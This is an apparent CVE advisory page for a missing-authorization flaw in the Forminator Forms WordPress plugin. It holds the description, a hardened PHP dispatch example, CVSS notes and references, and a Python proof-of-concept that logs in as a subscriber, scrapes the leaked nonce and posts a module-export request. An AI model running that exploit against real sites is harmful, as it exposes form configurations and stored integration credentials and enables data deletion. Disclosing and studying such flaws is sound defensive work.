Security Vulnerability Report

CVE-2026-6222 CVSS 5.3 MEDIUM

Published: 2026-05-07 02:16:38
Last Modified: 2026-05-07 14:00:06

Description

The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.51.1. This is due to the `processRequest()` method in `Forminator_Admin_Module_Edit_Page` (admin/abstracts/class-admin-module-edit-page.php) dispatching sensitive module-management actions — including export, delete, clone, delete-entries, publish/draft, and bulk variants — after only a nonce check, without ever verifying that the current user holds the `manage_forminator_modules` capability. The nonce used (`forminator_form_request`) is unconditionally embedded in the global `forminatorData` JavaScript object and localized on every Forminator admin page, including Templates and Reports pages accessible to users who explicitly lack module-management permissions. Because `processRequest()` is invoked during the `admin_menu` action hook — which fires before WordPress enforces page-level capability checks — a user whose Forminator role is restricted to Templates or Reports can craft a valid POST request targeting any published module and successfully trigger the vulnerable actions. This makes it possible for authenticated attackers with subscriber-level access (or any custom low-privilege Forminator role) to export the complete internal configuration of arbitrary forms/polls/quizzes (including notification routing, integration credentials, and conditional logic), delete modules, delete all submissions/votes, clone modules, or bulk-change publish/draft status.
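As an added illustration (not Forminator's code, and not taken from this page), the mu-plugin below puts the dispatch shape the description criticises beside a hardened version. The vulnerable function gates on the nonce alone and would be hooked to `admin_menu`; the hardened one checks a capability before anything else, verifies the nonce, applies a per-object `edit_post` check, hooks on `admin_post_{action}` instead of `admin_menu`, and only localizes the nonce for users who hold the capability. Every name prefixed `example_` (the capability, the nonce action, the request parameters, the script handle) is an assumption; the remaining calls are WordPress core APIs.

```php
<?php
/**
 * Plugin Name: Example module dispatch (hardened)
 *
 * Added illustration, not Forminator's code. Drop it into
 * wp-content/mu-plugins/ on a test site. All example_-prefixed names are
 * hypothetical; everything else is WordPress core.
 */

const EXAMPLE_CAP = 'example_manage_modules'; // hypothetical capability

/**
 * Vulnerable shape: a valid nonce is the only gate. A nonce only proves that
 * WordPress rendered a page for this logged-in user; when the nonce is
 * localized on pages any user can open, it authorizes nothing.
 */
function example_vulnerable_process_request() {
	if ( empty( $_POST['example_action'] ) || empty( $_POST['example_nonce'] ) ) {
		return;
	}
	if ( ! wp_verify_nonce( $_POST['example_nonce'], 'example_module_request' ) ) {
		return;
	}
	// Missing: current_user_can( EXAMPLE_CAP ). admin_menu fires on every
	// admin request before WordPress applies the capability registered for
	// the page being viewed, so the page-level check never runs first.
	example_run_module_action( sanitize_key( $_POST['example_action'] ), absint( $_POST['example_id'] ?? 0 ) );
}
// add_action( 'admin_menu', 'example_vulnerable_process_request' ); // the flawed hook, left disabled

/**
 * Hardened shape: authorization, then CSRF, then an object-level check.
 */
function example_hardened_process_request() {
	if ( ! current_user_can( EXAMPLE_CAP ) ) {
		wp_die( 'You are not allowed to manage modules.', '', array( 'response' => 403 ) );
	}
	check_admin_referer( 'example_module_request', 'example_nonce' ); // dies on a bad nonce

	$action    = sanitize_key( $_POST['example_action'] ?? '' );
	$module_id = absint( $_POST['example_id'] ?? 0 );

	// The blanket capability is not enough for a specific module: the user
	// must also be allowed to edit this post (core's edit_post meta cap).
	if ( ! $module_id || ! current_user_can( 'edit_post', $module_id ) ) {
		wp_die( 'You are not allowed to modify this module.', '', array( 'response' => 403 ) );
	}
	$ok = example_run_module_action( $action, $module_id );
	wp_safe_redirect( add_query_arg( 'example_result', $ok ? 'ok' : 'error', wp_get_referer() ?: admin_url() ) );
	exit;
}
// admin_post_{action} runs only for logged-in requests to admin-post.php whose
// action parameter is example_module_request; it is not tied to admin_menu.
add_action( 'admin_post_example_module_request', 'example_hardened_process_request' );

/** Export, delete, or change the status of a module stored as a post. */
function example_run_module_action( $action, $module_id ) {
	switch ( $action ) {
		case 'export':
			$post = get_post( $module_id );
			if ( ! $post ) {
				return false;
			}
			nocache_headers();
			header( 'Content-Type: application/json' );
			echo wp_json_encode( array(
				'title'   => $post->post_title,
				'content' => $post->post_content,
				'meta'    => get_post_meta( $module_id ),
			) );
			exit;
		case 'delete':
			return (bool) wp_delete_post( $module_id, true );
		case 'publish':
		case 'draft':
			return (bool) wp_update_post( array( 'ID' => $module_id, 'post_status' => $action ) );
		default:
			return false;
	}
}

/** Hand the nonce only to users who may use it. */
function example_localize_admin_data() {
	wp_register_script( 'example-admin', plugins_url( 'example-admin.js', __FILE__ ), array(), '1.0', true );
	$data = array( 'post_url' => admin_url( 'admin-post.php' ) );
	if ( current_user_can( EXAMPLE_CAP ) ) {
		$data['module_nonce'] = wp_create_nonce( 'example_module_request' );
	}
	wp_localize_script( 'example-admin', 'exampleData', $data );
	wp_enqueue_script( 'example-admin' );
}
add_action( 'admin_enqueue_scripts', 'example_localize_admin_data' );
```

The capability check is deliberately placed before the nonce check: a nonce failure should never be the only thing standing between a low-privilege user and a destructive action, and withholding the nonce from users without the capability removes the leak the description attributes to `forminatorData`.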

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Note: the vector scores confidentiality only (C:H, I:N, A:N), i.e. the configuration export. The description also lists delete, delete-entries, clone and publish/draft actions, which affect integrity and availability, so the 5.3 base score does not account for those on sites where low-privilege users can reach them. The assigned weakness is CWE-862 (Missing Authorization).

Configurations (Affected Products)

Forminator Forms <= 1.51.1 (no CPE configuration data was available at publication; the references include the same source file in the 1.52 tag, the first release after the affected range)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import sys

import requests

# Configuration (placeholders; replace with the authorized test target)
target_url = "http://example.com"
username = "subscriber"  # any authenticated user, e.g. a Subscriber or a Forminator role limited to Templates/Reports
password = "password"
module_id = "123"        # ID of the form/poll/quiz to target

session = requests.Session()

# 1. Log in to obtain authenticated cookies.
login_payload = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": target_url + "/wp-admin/",
}
session.post(target_url + "/wp-login.php", data=login_payload)
# wp-login.php answers 200 on a failed login too (it re-renders the form),
# so check for the logged-in cookie rather than the status code.
if not any(c.name.startswith("wordpress_logged_in_") for c in session.cookies):
    print("Login failed")
    sys.exit(1)

# 2. Extract the nonce from the forminatorData JavaScript object.
# Per the advisory the nonce is localized on every Forminator admin page, so any
# page this user can reach will do; this PoC uses the entries page slug.
admin_page = session.get(target_url + "/wp-admin/admin.php?page=forminator-entries")
# wp_localize_script() emits the object as JSON, so the key is normally quoted;
# accept both the quoted and the bare form.
nonce_match = re.search(r'"?forminator_form_request"?\s*:\s*"([a-zA-Z0-9]+)"', admin_page.text)
if not nonce_match:
    print("Nonce not found")
    sys.exit(1)
nonce = nonce_match.group(1)
print(f"Extracted Nonce: {nonce}")

# 3. Trigger the export action (delete/clone/etc. follow the same shape).
# The endpoint and parameter names are the ones this PoC uses; confirm them
# against the processRequest() source linked under References before relying on them.
exploit_url = target_url + "/wp-admin/admin-post.php"
payload = {
    "forminator_form_request": nonce,
    "forminator_id": module_id,
    "action": "forminator_form_export",  # vulnerable action
}
exploit_response = session.post(exploit_url, data=payload)
if exploit_response.status_code == 200:
    print("Exploit request sent successfully.")
    print("Response:", exploit_response.text[:200])
else:
    print("Exploit request failed.")

References

https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L1008
https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L951
https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-data.php#L141
https://plugins.trac.wordpress.org/browser/forminator/tags/1.52/admin/abstracts/class-admin-module-edit-page.php#L988
https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L1008
https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L951
https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-data.php#L141
https://www.wordfence.com/threat-intel/vulnerabilities/id/e860aa70-b8ef-4b2a-a035-b01efce30a79?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6222", "sourceIdentifier": "[email protected]", "published": "2026-05-07T02:16:37.920", "lastModified": "2026-05-07T14:00:05.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.51.1. This is due to the `processRequest()` method in `Forminator_Admin_Module_Edit_Page` (admin/abstracts/class-admin-module-edit-page.php) dispatching sensitive module-management actions — including export, delete, clone, delete-entries, publish/draft, and bulk variants — after only a nonce check, without ever verifying that the current user holds the `manage_forminator_modules` capability. The nonce used (`forminator_form_request`) is unconditionally embedded in the global `forminatorData` JavaScript object and localized on every Forminator admin page, including Templates and Reports pages accessible to users who explicitly lack module-management permissions. Because `processRequest()` is invoked during the `admin_menu` action hook — which fires before WordPress enforces page-level capability checks — a user whose Forminator role is restricted to Templates or Reports can craft a valid POST request targeting any published module and successfully trigger the vulnerable actions. This makes it possible for authenticated attackers with subscriber-level access (or any custom low-privilege Forminator role) to export the complete internal configuration of arbitrary forms/polls/quizzes (including notification routing, integration credentials, and conditional logic), delete modules, delete all submissions/votes, clone modules, or bulk-change publish/draft status."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L1008", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L951", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-data.php#L141", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.52/admin/abstracts/class-admin-module-edit-page.php#L988", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L1008", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L951", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-data.php#L141", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e860aa70-b8ef-4b2a-a035-b01efce30a79?source=cve", "source": "[email protected]"}]}}